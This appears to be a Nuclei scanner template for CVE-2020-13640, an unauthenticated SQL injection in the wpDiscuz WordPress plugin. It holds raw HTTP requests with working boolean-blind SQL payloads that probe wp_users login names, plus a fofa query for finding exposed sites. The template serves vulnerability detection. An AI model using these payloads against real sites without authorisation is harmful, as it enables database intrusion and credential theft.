漏洞描述
A SQL injection issue in the gVectors wpDiscuz plugin 5.3.5 and earlier for WordPress allows remote attackers to execute arbitrary SQL commands via the order parameter of a wpdLoadMoreComments request.
id: CVE-2020-13640
info:
name: wpDiscuz <= 5.3.5 - SQL Injection
author: Sourabh-Sahu
severity: critical
description: |
A SQL injection issue in the gVectors wpDiscuz plugin 5.3.5 and earlier for WordPress allows remote attackers to execute arbitrary SQL commands via the order parameter of a wpdLoadMoreComments request.
reference:
- https://github.com/asterite3/CVE-2020-13640
- https://nvd.nist.gov/vuln/detail/CVE-2020-13640
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-13640
epss-score: 0.70234
epss-percentile: 0.98609
cwe-id: CWE-89
cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
verified: true
vendor: gvectors
product: wpdiscuz
fofa-query: body="/wp-content/plugins/wpdiscuz"
tags: cve,cve2020,wordpress,wp,wp-plugin,wpdiscuz,sqli,vkev,vuln
flow: |
http(1)
set("postid", iterate(template.postid)[0])
http(2) && http(3)
http:
- raw:
- |
GET /wp-json/wp/v2/comments HTTP/1.1
Host: {{Host}}
stop-at-first-match: true
extractors:
- type: regex
name: postid
part: body
group: 1
regex:
- 'post"\s*:\s*([0-9]+)'
internal: true
- raw:
- |
POST /wp-content/plugins/wpdiscuz/utils/ajax/wpdiscuz-ajax.php HTTP/1.1
Host: {{Host}}
Content-Type: application/x-www-form-urlencoded
Connection: close
action=wpdLoadMoreComments&offset=1&orderBy=comment_date_gmt&order=, (SELECT CASE WHEN (ORD(SUBSTRING((SELECT user_login FROM wp_users LIMIT 0,1),1,1)) > 96) THEN 1 ELSE 1*(SELECT table_name FROM information_schema.tables) END)=1 ASC #&lastParentId=&postId={{postid}}
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- 'comment_list":"<div id=\"wc-comm'
internal: true
- raw:
- |
POST /wp-content/plugins/wpdiscuz/utils/ajax/wpdiscuz-ajax.php HTTP/1.1
Host: {{Host}}
Content-Type: application/x-www-form-urlencoded
Connection: close
action=wpdLoadMoreComments&offset=1&orderBy=comment_date_gmt&order=, (SELECT CASE WHEN (ORD(SUBSTRING((SELECT user_login FROM wp_users LIMIT 0,1),1,1)) > 97) THEN 1 ELSE 1*(SELECT table_name FROM information_schema.tables) END)=1 ASC #&lastParentId=&postId={{postid}}
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- '"comment_list":null'
condition: and
# digest: 4a0a004730450220755868bb3fc54737bba1fd389cd8753fe24999b7b3047b2a6f3e603ea10de0cd022100abb29500906dbe0b1ec3808c2e80de20cb73ab0335deee4de1e69c2dd8c23093:922c64590222798bb761d5b6d8e72950